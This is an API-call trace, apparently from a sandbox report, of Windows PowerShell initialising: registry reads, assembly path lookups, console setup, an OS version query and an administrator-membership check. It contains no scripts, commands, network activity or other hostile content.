	[0379.032] CoTaskMemAlloc (cb=0x66) returned 0x472aa0
	[0379.032] lstrcpyW (in: lpString1=0x472aa0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0379.032] CoTaskMemFree (pv=0x472aa0) 
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x0, puLen=0x26db70) returned 0
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x0, puLen=0x26db70) returned 0
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26db78, puLen=0x26db70 | out: lplpBuffer=0x26db78*=0x0, puLen=0x26db70) returned 0
	[0379.032] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26db48, puLen=0x26db40 | out: lplpBuffer=0x26db48*=0x2ea624c, puLen=0x26db40) returned 1
	[0379.032] CoTaskMemAlloc (cb=0x204) returned 0x41e820
	[0379.033] VerLanguageNameW (in: wLang=0x0, szLang=0x41e820, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0379.033] CoTaskMemFree (pv=0x41e820) 
	[0379.033] VerQueryValueW (in: pBlock=0x2ea61b0, lpSubBlock="\\", lplpBuffer=0x26db98, puLen=0x26db90 | out: lplpBuffer=0x26db98*=0x2ea61d8, puLen=0x26db90) returned 1
	[0379.041] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0379.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.041] CoTaskMemFree (pv=0x46a6b0) 
	[0379.046] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0379.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.046] CoTaskMemFree (pv=0x46a6b0) 
	[0379.050] lstrlenW (lpString="䅁") returned 1
	[0379.060] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da68 | out: phkResult=0x26da68*=0x300) returned 0x0
	[0379.062] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da58 | out: phkResult=0x26da58*=0x304) returned 0x0
	[0379.062] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26dae8 | out: phkResult=0x26dae8*=0x308) returned 0x0
	[0379.066] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26da2c, lpData=0x0, lpcbData=0x26da28*=0x0 | out: lpType=0x26da2c*=0x1, lpData=0x0, lpcbData=0x26da28*=0x56) returned 0x0
	[0379.411] CoTaskMemAlloc (cb=0x5a) returned 0x472a30
	[0379.411] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9fc, lpData=0x472a30, lpcbData=0x26d9f8*=0x56 | out: lpType=0x26d9fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d9f8*=0x56) returned 0x0
	[0379.411] CoTaskMemFree (pv=0x472a30) 
	[0379.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0379.439] CoTaskMemAlloc (cb=0x104) returned 0x46a6b0
	[0379.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a6b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.439] CoTaskMemFree (pv=0x46a6b0) 
	[0381.146] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0381.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0382.149] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0382.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.149] CoTaskMemFree (pv=0x46a7c0) 
	[0382.151] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0382.151] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.151] CoTaskMemFree (pv=0x46a7c0) 
	[0382.180] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0382.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.180] CoTaskMemFree (pv=0x46a7c0) 
	[0382.182] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0382.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.182] CoTaskMemFree (pv=0x46a7c0) 
	[0382.182] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0382.182] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0382.182] CoTaskMemFree (pv=0x46a7c0) 
	[0383.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0383.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0383.458] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0383.458] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0383.458] CoTaskMemFree (pv=0x46a7c0) 
	[0383.462] CoTaskMemAlloc (cb=0x104) returned 0x46a7c0
	[0383.462] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a7c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0383.462] CoTaskMemFree (pv=0x46a7c0) 
	[0384.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0384.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0385.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0386.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0386.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0386.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0386.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0387.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0387.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0387.719] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0387.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.719] CoTaskMemFree (pv=0x46a9e0) 
	[0387.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0388.463] SetErrorMode (uMode=0x1) returned 0x1
	[0388.463] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26d9c0 | out: lpFileInformation=0x26d9c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0388.464] SetErrorMode (uMode=0x1) returned 0x1
	[0390.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.197] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0390.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.197] CoTaskMemFree (pv=0x46a9e0) 
	[0390.200] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0390.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.200] CoTaskMemFree (pv=0x46a9e0) 
	[0390.200] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0390.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.201] CoTaskMemFree (pv=0x46a9e0) 
	[0390.204] CoCreateGuid (in: pguid=0x26dd88 | out: pguid=0x26dd88*(Data1=0xc676ff65, Data2=0x38b8, Data3=0x48a7, Data4=([0]=0xb3, [1]=0x77, [2]=0x68, [3]=0x35, [4]=0x80, [5]=0xc, [6]=0xb9, [7]=0xe7))) returned 0x0
	[0390.207] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0390.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.207] CoTaskMemFree (pv=0x46a9e0) 
	[0390.210] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0390.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.210] CoTaskMemFree (pv=0x46a9e0) 
	[0390.212] CoTaskMemAlloc (cb=0x104) returned 0x46a9e0
	[0390.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46a9e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.212] CoTaskMemFree (pv=0x46a9e0) 
	[0390.218] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0390.768] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x26da30 | out: lpConsoleScreenBufferInfo=0x26da30) returned 1
	[0390.773] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0390.773] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x26da30 | out: lpConsoleScreenBufferInfo=0x26da30) returned 1
	[0390.774] GetVersionExW (in: lpVersionInformation=0x26d9c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d9c0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0390.776] GetCurrentProcess () returned 0xffffffffffffffff
	[0390.777] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x26da58 | out: TokenHandle=0x26da58*=0x31c) returned 1
	[0390.781] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d978 | out: TokenInformation=0x0, ReturnLength=0x26d978) returned 0
	[0390.782] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e7250
	[0390.782] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x3e7250, TokenInformationLength=0x4, ReturnLength=0x26d978 | out: TokenInformation=0x3e7250, ReturnLength=0x26d978) returned 1
	[0390.782] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26dad8 | out: phNewToken=0x26dad8*=0x318) returned 1
	[0390.782] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26d978 | out: TokenInformation=0x0, ReturnLength=0x26d978) returned 0
	[0390.783] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e7280
	[0390.783] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x3e7280, TokenInformationLength=0x4, ReturnLength=0x26d978 | out: TokenInformation=0x3e7280, ReturnLength=0x26d978) returned 1
	[0390.783] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2f80f58*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26dae8 | out: IsMember=0x26dae8) returned 1
	[0390.783] CloseHandle (hObject=0x318) returned 1
	[0390.783] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.340] CoTaskMemAlloc (cb=0x804) returned 0x49f5e0
	[0391.340] GetConsoleTitleW (in: lpConsoleTitle=0x49f5e0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0391.341] CoTaskMemFree (pv=0x49f5e0) 
	[0391.838] CoTaskMemAlloc (cb=0x804) returned 0x49f5e0
	[0391.838] GetConsoleTitleW (in: lpConsoleTitle=0x49f5e0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0391.839] CoTaskMemFree (pv=0x49f5e0) 
	[0391.839] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
